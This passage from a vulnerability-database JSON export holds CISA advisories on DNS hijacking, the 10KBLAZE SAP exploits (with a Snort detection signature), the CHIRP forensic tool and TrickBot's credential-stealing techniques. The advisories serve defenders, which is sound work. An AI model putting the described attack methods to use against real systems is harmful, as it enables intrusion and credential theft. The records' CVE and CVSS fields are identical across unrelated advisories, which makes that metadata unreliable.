"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2022-02-10T12:00:00", "id": "AA21-243A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-243a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:37:49", "description": "### Summary\n\nThe National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. Using compromised credentials, an attacker can modify the location to which an organization\u2019s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization\u2019s domain names, enabling man-in-the-middle attacks.\n\nSee the following links for downloadable copies of open-source indicators of compromise (IOCs) from the sources listed in the References section below:\n\n * IOCs (.csv)\n * IOCs (.stix)\n\nNote: these files were last updated February 13, 2019, to remove the following three non-malicious IP addresses:\n\n * 107.161.23.204\n * 192.161.187.200\n * 209.141.38.71\n\n### Technical Details\n\nUsing the following techniques, attackers have redirected and intercepted web and mail traffic, and could do so for other networked services.\n\n 1. The attacker begins by compromising user credentials, or obtaining them through alternate means, of an account that can make changes to DNS records.\n 2. Next, the attacker alters DNS records, like Address (A), Mail Exchanger (MX), or Name Server (NS) records, replacing the legitimate address of a service with an address the attacker controls. This enables them to direct user traffic to their own infrastructure for manipulation or inspection before passing it on to the legitimate service, should they choose. This creates a risk that persists beyond the period of traffic redirection.\n 3. Because the attacker can set DNS record values, they can also obtain valid encryption certificates for an organization\u2019s domain names. This allows the redirected traffic to be decrypted, exposing any user-submitted data. Since the certificate is valid for the domain, end users receive no error warnings.\n\n### Mitigations\n\nNCCIC recommends the following best practices to help safeguard networks against this threat:\n\n * Update the passwords for all accounts that can change organizations\u2019 DNS records.\n * Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records.\n * Audit public DNS records to verify they are resolving to the intended location.\n * Search for encryption certificates related to domains and revoke any fraudulently requested certificates.\n\n### References\n\n[Cisco Talos blog: DNSpionage Campaign Targets Middle East ](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>)\n\n[CERT-OPMD blog: [DNSPIONAGE] \u2013 Focus on internal actions](<https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions>)\n\n[FireEye blog: Global DNS Hijacking Campaign: DNS Record Manipulation at Scale ](<https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html>)\n\n[Crowdstrike blog: Widespread DNS Hijacking Activity Targets Multiple Sectors](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors>)\n\n### Revisions\n\nJanuary 24, 2019: Initial version|February 6, 2019: Updated IOCs, added Crowdstrike blog|February 13, 2019: Updated IOCs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-13T12:00:00", "type": "ics", "title": "DNS Infrastructure Hijacking Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2019-02-13T12:00:00", "id": "AA19-024A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-024a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:36:47", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure configurations of SAP components. [[1](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\\(SAP\\)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)]\n\n### Technical Details\n\nA presentation at the April 2019 Operation for Community Development and Empowerment (OPCDE) cybersecurity conference describes SAP systems with unsecure configurations exposed to the internet. Typically, SAP systems are not intended to be exposed to the internet as it is an untrusted network. Malicious cyber actors can attack and compromise these unsecure systems with publicly available exploit tools, termed \u201c10KBLAZE.\u201d The presentation details the new exploit tools and reports on systems exposed to the internet.\n\n#### SAP Gateway ACL\n\nThe SAP Gateway allows non-SAP applications to communicate with SAP applications. If SAP Gateway access control lists (ACLs) are not configured properly (e.g., gw/acl_mode = 0), anonymous users can run operating system (OS) commands.[[2](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)] According to the OPCDE presentation, about 900 U.S. internet-facing systems were detected in this vulnerable condition.\n\n#### SAP Router secinfo\n\nThe SAP router is a program that helps connect SAP systems with external networks. The default `secinfo` configuration for a SAP Gateway allows any internal host to run OS commands anonymously. If an attacker can access a misconfigured SAP router, the router can act as an internal host and proxy the attacker\u2019s requests, which may result in remote code execution.\n\nAccording to the OPCDE presentation, 1,181 SAP routers were exposed to the internet. It is unclear if the exposed systems were confirmed to be vulnerable or were simply running the SAP router service.\n\n#### SAP Message Server\n\nSAP Message Servers act as brokers between Application Servers (AS). By default, Message Servers listen on a port 39XX and have no authentication. If an attacker can access a Message Server, they can redirect and/or execute legitimate man-in-the-middle (MITM) requests, thereby gaining credentials. Those credentials can be used to execute code or operations on AS servers (assuming the attacker can reach them). According to the OPCDE presentation, there are 693 Message Servers exposed to the internet in the United States. The Message Server ACL must be protected by the customer in all releases.\n\n#### Signature\n\nCISA worked with security researchers from Onapsis Inc.[[3](<https://www.onapsis.com/>)] to develop the following Snort signature that can be used to detect the exploits:\n\nalert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:\"10KBLAZE SAP Exploit execute attempt\"; flow:established,to_server; content:\"|06 cb 03|\"; offset:4; depth:3; content:\"SAPXPG_START_XPG\"; nocase; distance:0; fast_pattern; content:\"37D581E3889AF16DA00A000C290099D0001\"; nocase; distance:0; content:\"extprog\"; nocase; distance:0; sid:1; rev:1;)\n\n### Mitigations\n\nCISA recommends administrators of SAP systems implement the following to mitigate the vulnerabilities included in the OPCDE presentation:\n\n * Ensure a secure configuration of their SAP landscape.\n * Restrict access to SAP Message Server. \n * Review SAP Notes 1408081 and 821875. Restrict authorized hosts via ACL files on Gateways (`gw/acl_mode `and `secinfo`) and Message Servers (`ms/acl_info`).[[4](<https://launchpad.support.sap.com/#/notes/1408081>)], [[5](<https://launchpad.support.sap.com/#/notes/821875>)]\n * Review SAP Note 1421005. Split MS internal/public:` rdisp/msserv=0 rdisp/msserv_internal=39NN`. [[6](<https://launchpad.support.sap.com/#/notes/1421005>)]\n * Restrict access to Message Server internal port (`tcp/39NN`) to clients or the internet.\n * Enable Secure Network Communications (SNC) for clients.\n * Scan for exposed SAP components. \n * Ensure that SAP components are not exposed to the internet.\n * Remove or secure any exposed SAP components.\n\n### References\n\n[[1] Comae Technologies: Operation for Community Development and Empowerment (OPCDE) Cybersecurity Conference Materials ](<https://github.com/comaeio/OPCDE/tree/master/2019/Emirates/\\(SAP\\)%20Gateway%20to%20Heaven%20-%20Dmitry%20Chastuhin%2C%20Mathieu%20Geli>)\n\n[[2] SAP: Gateway Access Control Lists ](<https://wiki.scn.sap.com/wiki/display/SI/Gateway+Access+Control+Lists>)\n\n[[3] Onapsis Inc. website ](<https://www.onapsis.com>)\n\n[[4] SAP Note 1408081 ](<https://launchpad.support.sap.com/#/notes/1408081>)\n\n[[5] SAP Note 821875 ](<https://launchpad.support.sap.com/#/notes/821875>)\n\n[[6] SAP Note 1421005 ](<https://launchpad.support.sap.com/#/notes/1421005>)\n\n### Revisions\n\nMay 2, 2019: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-03T12:00:00", "type": "ics", "title": "New Exploits for Unsecure SAP Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2019-05-03T12:00:00", "id": "AA19-122A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-122a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:28:44", "description": "### Summary\n\n_**Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>). For more information on SolarWinds-related activity, go to <https://us-cert.cisa.gov/remediating-apt-compromised-networks> and <https://www.cisa.gov/supply-chain-compromise>.**_\n\nThis Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:\n\n * AA20-352A: [Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>), which primarily focuses on an advanced persistent threat (APT) actor\u2019s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.\n * AA21-008A: [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>), which addresses APT activity within Microsoft 365/Azure environments and offers an overview of\u2014and guidance on\u2014available open-source tools. The Alert includes the [CISA-developed Sparrow tool ](<https://github.com/cisagov/Sparrow>)that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.\n\nSimilar to [Sparrow](<https://github.com/cisagov/Sparrow>)\u2014which scans for signs of APT compromise within an M365 or Azure environment\u2014CHIRP scans for signs of APT compromise within an on-premises environment.\n\nIn this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment.\n\nCHIRP is freely available on the [CISA GitHub Repository](<https://github.com/cisagov>). For additional guidance watch CISA's [CHIRP Overview video](<https://www.youtube.com/watch?v=UGYSNiNOpds>). **Note:** CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository.\n\nCISA advises organizations to use CHIRP to:\n\n * Examine Windows event logs for artifacts associated with this activity;\n * Examine Windows Registry for evidence of intrusion;\n * Query Windows network artifacts; and\n * Apply YARA rules to detect malware, backdoors, or implants.\n\nNetwork defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. **Note**: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n#### How CHIRP Works\n\nCHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts [AA20-352A](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>) and [AA21-008A](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>).\n\nCurrently, the tool looks for:\n\n * The presence of malware identified by security researchers as [TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>) and RAINDROP;\n * Credential dumping certificate pulls;\n * Certain persistence mechanisms identified as associated with this campaign;\n * System, network, and M365 enumeration; and\n * Known observable indicators of lateral movement.\n\nNetwork defenders can follow step-by-step instructions on the [CISA CHIRP GitHub repository](<https://github.com/cisagov/CHIRP>) to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity.\n\n#### **Compatibility**\n\nCHIRP currently only scans Windows operating systems.\n\n#### **Instructions**\n\nCHIRP is available on CISA\u2019s GitHub repository in two forms:\n\n 1. A compiled executable\n\n 2. A python script\n\nCISA recommends using the compiled version to easily scan a system for APT activity. For instructions to run, read the README.md in the CHIRP GitHub repository.\n\nIf you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository.\n\n### Mitigations\n\n#### Interpreting the Results\n\nCHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP\u2019s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).\n\nIf you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. **Note:** Responding to confirmed positive hits is essential to evict an adversary from a compromised network.\n\n#### **Frequently Asked Questions**\n\n 1. **What systems should CHIRP run on?**\n\nSystems running SolarWinds Orion or believed to be involved in any resulting lateral movement.\n\n 2. **What should I do with results?**\n\nIngest the JSON results into a SIEM system, web browser, or text editor.\n\n 3. **Are there existing tools that CHIRP complements and/or provide the same benefit as CHIRP?** \n\n 1. Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run.\n\n 2. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. CHIRP provides a complementary capability to Sparrow by scanning for on-premises systems for similar activity.\n\n 4. **How often should I run CHIRP?**\n\nCHIRP can be run once or routinely. Currently, CHIRP does not provide a mechanism to run repeatedly in its native format.\n\n 5. **Do I need to configure the tool before I run it?**\n\nNo.\n\n 6. **Will CHIRP change or affect anything on the system(s) it runs on?**\n\nNo, CHIRP only scans the system(s) it runs on and makes no active changes.\n\n 7. **How long will it take to run CHIRP?**\n\nCHIRP will complete its scan in approximately 1 to 2 hours. Duration will be dependent on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs.\n\n 8. **If I have questions, who do I contact? **\n\nFor general questions regarding CHIRP, please contact CISA via email at [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov>) or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at <https://us-cert.cisa.gov/report>. For all technical issues or support for CHIRP, please submit issues at the [CISA CHIRP GitHub Repository](<https://github.com/cisagov/CHIRP>). \n\n### Revisions\n\nMarch 18, 2021: Initial Publication |April 9, 2021: Fixed PDF (not related to content)|April 15, 2021: Updated with Attribution Statement\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-15T12:00:00", "type": "ics", "title": "Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2021-04-15T12:00:00", "id": "AA21-077A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-077a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:28:48", "description": "### Summary\n\n_This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 8. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.\n\nTrickBot\u2014first identified in 2016\u2014is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.\n\nTo secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nTrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which\u2014if enabled\u2014execute malware (_Phishing:_ _Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/versions/v8/techniques/T1566/001/>)], _Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002>)]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation. (_User Execution: Malicious Link_ [[T1204.001](<https://attack.mitre.org/versions/v8/techniques/T1204/001/>)], _User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002/>)]). In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor\u2019s command and control (C2) server to download TrickBot to the victim\u2019s system (_Command and Scripting Interpreter: JavaScript_ [[T1059.007](<https://attack.mitre.org/versions/v8/techniques/T1059/007/>)]).\n\nAttackers can use TrickBot to:\n\n * Drop other malware, such as Ryuk and Conti ransomware, or\n * Serve as an Emotet downloader (_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/versions/v8/techniques/T1105/>)]).[[1](<https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html>)]\n\nTrickBot uses person-in-the-browser attacks to steal information, such as login credentials (_Man in the Browser_ [[T1185](<https://attack.mitre.org/versions/v8/techniques/T1185/>)]). Additionally, some of TrickBot\u2019s modules spread the malware laterally across a network by abusing the Server Message Block (SMB) Protocol. TrickBot operators have a toolset capable of spanning the entirety of the MITRE ATT&CK framework, from actively or passively gathering information that can be used to support targeting (_Reconnaissance _[[TA0043](<https://attack.mitre.org/tactics/TA0043/>)]), to trying to manipulate, interrupt, or destroy systems and data (_Impact _[[TA0040](<https://attack.mitre.org/tactics/TA0040/>)]).\n\nTrickBot is capable of data exfiltration over a hardcoded C2 server, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041/>)], _Resource Hijacking_ [[T1496](<https://attack.mitre.org/versions/v8/techniques/T1496>)], System Information Discovery.[[2](<https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/#background>)] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks.\n\nFigure 1 lays out TrickBot\u2019s use of enterprise techniques.\n\n\n\n_Figure 1: MITRE ATT&CK enterprise techniques used by TrickBot _\n\n### MITRE ATT&CK Techniques\n\nAccording to MITRE, _TrickBot_ [[S0266](<https://attack.mitre.org/software/S0266/>)] uses the ATT&CK techniques listed in table 1.\n\n_Table 1: TrickBot ATT&CK techniques for enterprise_\n\n_Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v8/tactics/TA0001/>)]\n\n**Technique Title**\n\n| **ID** | **Use** \n---|---|--- \nPhishing: Spearphishing Attachment | [T1566.001](<https://attack.mitre.org/versions/v8/techniques/T1566/001/>) | TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware. \nPhishing: Spearphishing Link | [T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002>) | \n\nTrickBot has been delivered via malicious links in phishing emails. \n \n_Execution_ [[TA0002](<https://attack.mitre.org/versions/v8/tactics/TA0002/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. \nCommand and Scripting Interpreter: Windows Command Shell | [T1059.003](<https://attack.mitre.org/versions/v8/techniques/T1059/003/>) | TrickBot has used macros in Excel documents to download and deploy the malware on the user\u2019s machine. \nCommand and Scripting Interpreter: JavaScript/JScript | [T1059.007](<https://attack.mitre.org/versions/v8/techniques/T1059/007/>) | TrickBot victims unknowingly download a malicious JavaScript file that, when opened, automatically communicates with the malicious actor\u2019s C2 server to download TrickBot to the victim\u2019s system. \nNative API | [T1106](<https://attack.mitre.org/versions/v8/techniques/T1106>) | TrickBot uses the Windows Application Programming Interface (API) call, CreateProcessW(), to manage execution flow. \nUser Execution: Malicious Link | [T1204.001](<https://attack.mitre.org/versions/v8/techniques/T1204/001/>) | TrickBot has sent spearphishing emails in an attempt to lure users to click on a malicious link. \nUser Execution: Malicious File | [T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002/>) | TrickBot has attempted to get users to launch malicious documents to deliver its payload. \n \n_Persistence_ [[TA0003](<https://attack.mitre.org/versions/v8/tactics/TA0003/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. \nCreate or Modify System Process: Windows Service | [T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003/>) | TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots. \n \n_Privilege Escalation _[[TA0004](<https://attack.mitre.org/versions/v8/tactics/TA0004/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. \nProcess Injection: Process Hollowing | [T1055.012](<https://attack.mitre.org/versions/v8/techniques/T1055/012/>) | TrickBot injects into the svchost.exe process. \nCreate or Modify System Process: Windows Service | [T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003/>) | TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots. \n \n_Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v8/tactics/TA0005/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nObfuscated Files or Information | [T1027](<https://attack.mitre.org/versions/v8/techniques/T1027>) | TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files. \nObfuscated Files or Information: Software Packing | [T1027.002](<https://attack.mitre.org/versions/v8/techniques/T1027/002/>) | TrickBot leverages a custom packer to obfuscate its functionality. \nMasquerading | [T1036](<https://attack.mitre.org/versions/v8/techniques/T1036>) | The TrickBot downloader has used an icon to appear as a Microsoft Word document. \nProcess Injection: Process Hollowing | [T1055.012](<https://attack.mitre.org/versions/v8/techniques/T1055/012/>) | TrickBot injects into the svchost.exe process. \nModify Registry | [T1112](<https://attack.mitre.org/versions/v8/techniques/T1112/>) | TrickBot can modify registry entries. \nDeobfuscate/Decode Files or Information | [T1140](<https://attack.mitre.org/versions/v8/techniques/T1140>) | TrickBot decodes the configuration data and modules. \nSubvert Trust Controls: Code Signing | [T1553.002](<https://attack.mitre.org/versions/v8/techniques/T1553/002/>) | TrickBot has come with a signed downloader component. \nImpair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/versions/v8/techniques/T1562/001/>) | TrickBot can disable Windows Defender. \n \n_Credential Access _[[TA0006](<https://attack.mitre.org/versions/v8/tactics/TA0006/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nInput Capture: Credential API Hooking | [T1056.004](<https://attack.mitre.org/versions/v8/techniques/T1056/004/>) | TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. \nUnsecured Credentials: Credentials in Files | [T1552.001](<https://attack.mitre.org/versions/v8/techniques/T1552/001/>) | TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the .vnc.lnk affix to steal VNC credentials. \nUnsecured Credentials: Credentials in Registry | [T1552.002](<https://attack.mitre.org/versions/v8/techniques/T1552/002/>) | TrickBot has retrieved PuTTY credentials by querying the Software\\SimonTatham\\Putty\\Sessions registry key. \nCredentials from Password Stores | [T1555](<https://attack.mitre.org/versions/v8/techniques/T1555>) | TrickBot can steal passwords from the KeePass open-source password manager. \nCredentials from Password Stores: Credentials from Web Browsers | [T1555.003](<https://attack.mitre.org/versions/v8/techniques/T1555/003/>) | TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl. \n \n_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v8/tactics/TA0007/>)]\n\n**Technique Tactic** | **ID** | **Use** \n---|---|--- \nSystem Service Discovery | [T1007](<https://attack.mitre.org/versions/v8/techniques/T1007/>) | TrickBot collects a list of install programs and services on the system\u2019s machine. \nSystem Network Configuration Discovery | [T1016](<https://attack.mitre.org/versions/v8/techniques/T1016>) | TrickBot obtains the IP address, location, and other relevant network information from the victim\u2019s machine. \nRemote System Discovery | [T1018](<https://attack.mitre.org/versions/v8/techniques/T1018>) | TrickBot can enumerate computers and network devices. \nSystem Owner/User Discovery | [T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>) | TrickBot can identify the user and groups the user belongs to on a compromised host. \nPermission Groups Discovery | [T1069](<https://attack.mitre.org/versions/v8/techniques/T1069>) | TrickBot can identify the groups the user on a compromised host belongs to. \nSystem Information Discovery | [T1082](<https://attack.mitre.org/versions/v8/techniques/T1082>) | TrickBot gathers the OS version, machine name, CPU type, amount of RAM available from the victim\u2019s machine. \nFile and Directory Discovery | [T1083](<https://attack.mitre.org/versions/v8/techniques/T1083>) | TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information. \nAccount Discovery: Local Account | [T1087.001](<https://attack.mitre.org/versions/v8/techniques/T1087/001>) | TrickBot collects the users of the system. \nAccount Discovery: Email Account | [T1087.003](<https://attack.mitre.org/versions/v8/techniques/T1087/003>) | TrickBot collects email addresses from Outlook. \nDomain Trust Discovery | [T1482](<https://attack.mitre.org/versions/v8/techniques/T1482>) | TrickBot can gather information about domain trusts by utilizing Nltest. \n \n_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v8/tactics/TA0008/>)]\n\n**Technique Tactic** | **ID** | **Use** \n---|---|--- \nLateral Tool Transfer | [T1570](<https://attack.mitre.org/versions/v8/techniques/T1570>) | Some TrickBot modules spread the malware laterally across a network by abusing the SMB Protocol. \n \n_Collection_ [[TA0009](<https://attack.mitre.org/versions/v8/tactics/TA0009/>)]\n\n**Technique Tactic ** | **ID** | **Use** \n---|---|--- \nData from Local System | [T1005](<https://attack.mitre.org/versions/v8/techniques/T1005>) | TrickBot collects local files and information from the victim\u2019s local machine. \nInput Capture:Credential API Hooking | [T1056.004](<https://attack.mitre.org/versions/v8/techniques/T1056/004/>) | TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. \nPerson in the Browser | [T1185](<https://attack.mitre.org/versions/v8/techniques/T1185>) | TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified 